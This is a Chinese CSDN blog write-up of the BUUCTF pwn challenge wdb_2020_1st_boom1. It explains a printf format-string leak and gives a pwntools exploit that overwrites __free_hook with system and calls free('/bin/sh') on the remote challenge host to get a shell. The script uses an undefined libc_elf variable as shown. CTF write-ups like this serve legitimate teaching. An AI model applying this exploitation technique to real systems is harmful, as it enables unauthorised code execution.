[BUUCTF-pwn] wdb_2020_1st_boom1

最新推荐文章于 2022-11-09 21:05:08 发布
最新推荐文章于 2022-11-09 21:05:08 发布
阅读量3.3k 收藏
点赞数
分类专栏: CTF pwn 文章标签: python 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121459077
版权
本文介绍了如何在无法直接获取远程libc库地址的情况下,通过printf泄露内存地址来计算偏移,从而实现漏洞利用。作者分享了其在网鼎杯2020比赛中遇到的问题和解决方案,包括使用特定格式的printf泄露__libc_start_main_ret地址,以及如何根据本地和远程环境的差异计算free_hook和system的偏移,最终达到执行shell的目的。
摘要由CSDN通过智能技术生成

网鼎杯 2020 boom1

学习了 BOI Team 的wp,感觉没弄太明白,主要是远程的偏移计算方法。自己消化一下,想出一个自我感觉比较方便的方法。

这是一个虚拟机的题,用给定的一些关键字写个c程序,然后运行得到shell

师傅的方法:

        由于都是通过mmap生成的堆,所以跟libc是连续,计算出程序当前变量位置与free_hook和system的偏移 *(free_hook) = system然后free(/bin/sh)就OK了

        但问题是本地的偏移通过Gdb得到很容易,buu远程上的libc是一个很难找到的libc(libc可以下载,但对应的ld找不到,也许能找到但比赛的时候给出来也得当找不到的作)

        所以我在这用了一次printf("0x%lx %21$p",&a); 这样一次打印出libc_main_ret和a的地址,便可计算出偏移,堆与libc邻不邻无所谓。

from pwn import *

'''
patchelf --set-interpreter /home/shi/pwn/libc6_2.27-3u1/lib64/ld-2.27.so pwn
patchelf --add-needed /home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so pwn
'''

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 26829) 

context.log_level = 'debug'
'''
libc : 0x00007ffff7a1e000
__free_hook : 0x7f626872b8e8 <__free_hook>   &a - 0x1616f0
system      : 0x7f62683b7580 <system>        &a - 0x4d5a58
&a          :     0x6888cfd8
'''
#gdb.attach(p)
#pause()
#base = 0x517fd8 #local
base = 0x54dfd8 #remote
off1 = (base - libc_elf.sym['__free_hook'])//8
off2 = (base - libc_elf.sym['system'])//8
print('_free_hook,system',off1, off2)
#通过这个长的printf找到libc_start_main_ret 为21
#payload = 'main(){int a; printf("%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p");}\n'
'''
b'(nil)-(nil)-(nil)-(nil)-(nil)-0x7ffe3ddb0750-(nil)-0x1-0x1-0x7f2762bf2048
-0x7f2762baffd0-0x7f2762baffe0-0x7f2762bb1010-0x4-0x25-0x40000-0x7f2762c335b0-0x7f2762baffd8-0x6bb73c06bded3e00-0x55c67dfa5e30
-0x7f27626b9a87   <------ __libc_start_main_ret+231
'''
#payload = 'main(){int a; printf("0x%lx %21$p",&a);}'
payload = 'main(){int a; *(&a-'+str(off1)+')=&a-'+str(off2)+';free("/bin/sh");}\n' #local
p.sendafter(b"I'm living...\n", payload.encode())
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 885
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 426
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 507
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 281
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3214
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 967
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 409
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1593
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4064
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 271
buuctf pwn 027-031题
BUUCTF·[网鼎杯 2020 青龙组]boom·WP
sm1918451478的博客
11-09 730
BUUCTF·[网鼎杯 2020 青龙组]boom·WP
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 241
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1139
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 236
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 546
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2020
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 659
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值